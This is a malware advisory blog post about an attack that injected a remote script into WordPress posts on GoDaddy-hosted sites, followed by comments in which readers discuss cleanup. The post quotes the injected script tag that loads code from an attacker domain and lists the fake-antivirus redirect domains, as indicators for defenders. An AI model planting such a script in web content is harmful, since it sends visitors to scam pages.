Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time, the attackers changed tactics and instead of infecting the PHP files, they injected malicious code inside the database. On the WordPress infected sites, they added the following javascript inside every post (on the wp_posts table):

<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>

As you can imagine, this javascript redirects the user to the infamous “Fake AV” pages:

www3.smartsuite-4u.in
www3.top-scan-foru.in
www4.first-internetmaster.net
www4.smartinternet-foryou.net
www4.seeeresafe.in
www4.seefredsafe.in
www3.save-internet-foru.com

All of them hosted at 65.23.153.126 and 91.193.194.64. If you are a hosting provider, please make sure to block those IP addresses and domains (none of them are currently blacklisted).

As far as who’s is behind this attack, it seems the same group as the previous attackes. They’ve changed their name to Hilary Buff instead of Hilary Kneber.

Registrant Contact:
HardSoft, inc
Hilary Buff admin@acrossuniverseitbenet.com
56764545 fax: 56764545
29/2 Sun street. Montey 29
London NY 45453
gb

If your site is currently infected, you have to remove these malicious entries from every post (just log to wp-admin to do so).


If you need help doing so, please contact us at support@sucuri.net or visit our site Sucuri Security. We can get you cleaned up pretty quickly.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Bryan

    I did a search and it shows up over 21,000 times! Is there a script to use for this??

    • http://armeda.com/ Andres Armeda

      Bryan, sorry, but we do not have a script available for this outbreak at this time. If you contact us at support@sucuri.net we can try to assist.

      • Bryan

        Weird…appears to be only attacking my username which is an admin, and no one else…I think. on phone w godaddy now..we’re baffled about it..

        • Bryan

          Correction, still seems to be infected all Usernames. On a different computer though. Figures Go Daddy couldn’t find the problem.

          • Bryan

            Not sure how but seems the script has been removed from my site. either from the hosting or maybe by me deleting some plugins? NO IDEA. This was the strangest malware i’ve gotten to date.

          • http://armeda.com/ Andres Armeda

            I ran a scan and the site is showing clean now. I’d recommend changing your passwords just in case.

          • Bryan

            Go Daddy cleaned it apparently. Thanks. I’ll change passwords to everything to be safe. …like that will help hahaha

          • Dani

            I hope they clean mine too. Was yours cleaned because of a support ticket you put in?

          • http://armeda.com/ Andres Armeda

            Hi Dani,

            We offer malware cleanup packages on our main site. Right now we have a holiday discount for all http://sucuri.net/holidays

            If you’re interested we can get you cleaned up within the next couple of hours.

            If you have any further questions, feel free to email us at support@sucuri.net

            Thanks,

            Dre

          • Dani

            I anxiously await a script for this myself, because both of my blogs (http://blog.little-miss.org/ and http://mumsy.little-miss.org/) got hit. It’s going to be very difficult to clean manually, and of course I turn to you guys for practically everything GoDaddy fail-related.

    • http://www.co.cc/?id=152449 Dvdmxll

      I can clean your posts and databases quite quickly with a semi-automated method. Contact me: dvdmxll (at) yahoo.com

  • Pingback: Tweets that mention Attacks against GoDaddy – acrossuniverseitbenet.com + Hilary Kneber + HardSoft | Sucuri -- Topsy.com()

  • Bryan

    Also, how do you we prevent this from happening from again? This is about the 100th time I’ve been hacked on a Godaddy site this year. Really need to get off their servers…

    • http://armeda.com/ Andres Armeda

      Unfortunately, this looks like a provider issue and in these instances, there is not much that can be done to mitigate the risk.

  • Bryan

    Since no one is replying, I’ll reply back to myself and say the search & replace in the database and a plugin for search & replace for wordpress DOESN’T work! I’m at wits end here

  • Pingback: Big Bear Butt Blogger » Site is still infected with redirect()

  • http://twitter.com/thoughtoffice thoughtoffice

    We got nailed, too. Happily, we have only about 120 total pages and posts on our site right now, so a manual edit of each page didn’t take too long. Some things I found helped the process:

    [1] Open the WP “Posts” page in the dashboard, then open a bunch of posts in separate browser tabs. This allows you to edit and update a whole bunch of posts very quickly.

    [2] Same process for “Pages” – edit a whole bunch of pages in individual tabs.

    [3] Open the page or post in the edit window, and scroll to the bottom in HTML edit mode. The inserted Javascript is always at the bottom of the post content. Select, delete, and update. Move to the next tab while WordPress is thinking.

    [4] Once you’ve gotten to the last of the open editor tabs, go back to the first. Verify the post has updated, and that the JS code is gone from the bottom of the post. Close the tab and move to the next.

    [5] Keep going until you’ve got all your pages and posts updated. It may be helpful to print your Page or Post listing, to use as a checklist as you proceed.

    [6] I use the NoScript plugin for Firefox – that’s how I learned we had been infected. A notification showed at the bottom of the browser window, asking whether I wanted to allow acrossuniverseitbenet(dot)com. Gave us a good, early heads up.

    [7] We also use WP SuperCache on our site. If you cache pages, be sure to go in and delete the cache. That makes certain that all your updates are immediately served to your visitors.

    We’re now seriously considering moving all our hosting off GoDaddy. This is not the first time their laxity has bit us in the posterior.

    Good luck, everyone.
    Dave Lockman
    info@thoughtoffice.com

  • http://www.buzzerblog.com/ thealexdavis

    I got hit also. I’ve got around 3,000 posts/pages so this is a massive hassle, as we are a news site. I’ve gotten around 200 pages manually cleared. If there’s any semi-automatic way to do this I’m hoping to hear soon. At least for now I’ve got the archives cleared for the past 5 months and I’ve got all the individual pages fixed. I checked the other codes and we’re all good there. Hopefully something pops up.

  • Guest

    Hi, thanks as always Sucuri for being there… I’m on GoDaddy but not for much longer. My sites have not been hit with this, but they’ve grown much larger this year and I just don’t feel comfortable there any more – too many attacks let through.

    I try to keep good database backups. Since this attack does not appear to affect PHP, would just restoring the previous (confirmed good) WordPress database backup work in order to fix it? Thank you!

  • Guest

    DM them on twitter. They just cleaned our site within minutes.

  • CrazedMama

    My site was cleaned last night but I noticed in WP there is a hidden administrator account. I’ve gone through the db side of things and can’t seem to locate the culprit.

  • Pingback: Another Hack » Cyclelicious()

  • Andre

    Here is an official response from Godaddy on how to handle it.

    http://community.godaddy.com/godaddy/security-update-malware-affecting-some-databases/

  • Pingback: Wordpress Sites on GoDaddy Vulnerable to Malware Hack()

  • http://twitter.com/thoughtoffice thoughtoffice

    Our site got infected again today. At least we’re getting better and faster at deleting the offending Javascript code. 😉 We also went in and changed the MySQL password, hoping that will slow the hackers down a bit. If you do this for your site, don’t forget to edit wp-config.php to make the password match the new one you selected for your MySQL database, otherwise your site will break.

    Ran into some trouble trying to submit a ticket to GoDaddy. Trying to be as helpful as possible, I pasted the script code into the body of the message. The result – a less than helpful error message stating:

    “The following fields have invalid input:
    Question”.

    One of our staffers suggested that the JS code was the issue. It was. Removed that code from the body of the message and GoDaddy was finally happy. Joy.

    We’re hoping they resolve the issue for us. Massive thanks to everyone on Sucuri for being so quick to post the issue and a solution.

  • Steve

    I gave up on shared hosting. To much hassle.

  • Pingback: WordPress GoDaddy MalWare Infection – acrossuniverseitbenet()

  • http://about.me/lorenbaxter Loren Baxter

    For those still looking for a SQL script to clear this problem up quickly, there’s one detailed over here: http://just-ask-kim.com/wordpress-godaddy-malware-infection-acrossuniverseitbenet/

Share This